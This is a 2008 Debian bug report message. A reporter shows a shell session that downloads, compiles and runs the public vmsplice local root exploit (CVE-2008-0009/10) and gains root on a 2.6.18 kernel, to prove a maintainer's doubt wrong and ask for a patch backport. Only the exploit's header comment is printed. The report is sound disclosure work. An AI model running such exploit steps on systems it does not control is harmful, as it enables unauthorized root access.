Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

["Vitaliy Okulov" <vitaliy.okulov@gmail.com>]

Yep, im sure.

Copy of exploit: http://www.securityfocus.com/bid/27704/exploit

doktor@doktor:~/coding/sample$ wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
--12:25:09-- http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
  => `27704.c'
Resolving downloads.securityfocus.com... 205.206.231.23
Connecting to downloads.securityfocus.com|205.206.231.23|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,264 (6.1K) [text/plain]

100%[=================================================================================================================>] 6,264 28.84K/s

12:25:10 (28.75 KB/s) - `27704.c' saved [6264/6264]

doktor@doktor:~/coding/sample$ vi 27704.c
doktor@doktor:~/coding/sample$ uname -a
Linux doktor 2.6.18-6-686 #1 SMP Wed Jan 23 03:23:22 UTC 2008 i686 GNU/Linux
doktor@doktor:~/coding/sample$ id
uid=1000(doktor) gid=1000(doktor) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(doktor),1001(shutdown),1002(vboxusers)
doktor@doktor:~/coding/sample$ head -n 20 27704.c
/*
 * jessica_biel_naked_in_my_bed.c
 *
 * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
 * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
 * Stejnak je to stare jak cyp a aj jakesyk rozbite.
 *
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 *
 * This is quite old code and I had to rewrite it to even compile.
 * It should work well, but I don't remeber original intent of all
 * the code, so I'm not 100% sure about it. You've been warned ;)
 *
 * -static -Wno-format
 */
#define _GNU_SOURCE
#include <stdio.h>
doktor@doktor:~/coding/sample$ gcc -static -Wno-format 27704.c -o root_expl
doktor@doktor:~/coding/sample$ ./root_expl
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7fc8000 .. 0xb7ffa000
[+] root
root@doktor:~/coding/sample# id
uid=0(root) gid=0(root) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(doktor),1001(shutdown),1002(vboxusers)
root@doktor:~/coding/sample# exit
doktor@doktor:~/coding/sample$

So exploit works.

2008/2/10, Florian Weimer <fw@deneb.enyo.de>:

* Okulov Vitaliy:

> Just try explot from http://www.milw0rm.com/exploits/5092 at my
> linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
> from 2.6.24.1 kernel (CVE-2008-0009/10).

Milw0rm is down.  Are you sure the exploit is real?  The vulnerable code
is not present in the 2.6.18 kernel.